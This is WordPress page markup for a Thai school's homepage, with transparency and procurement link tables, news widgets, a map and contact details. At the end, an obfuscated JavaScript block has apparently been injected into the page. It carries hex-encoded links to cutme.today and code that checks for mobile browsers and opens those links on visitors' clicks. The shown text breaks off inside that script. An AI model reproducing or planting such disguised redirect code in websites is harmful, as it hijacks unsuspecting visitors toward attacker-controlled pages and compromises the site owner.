wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 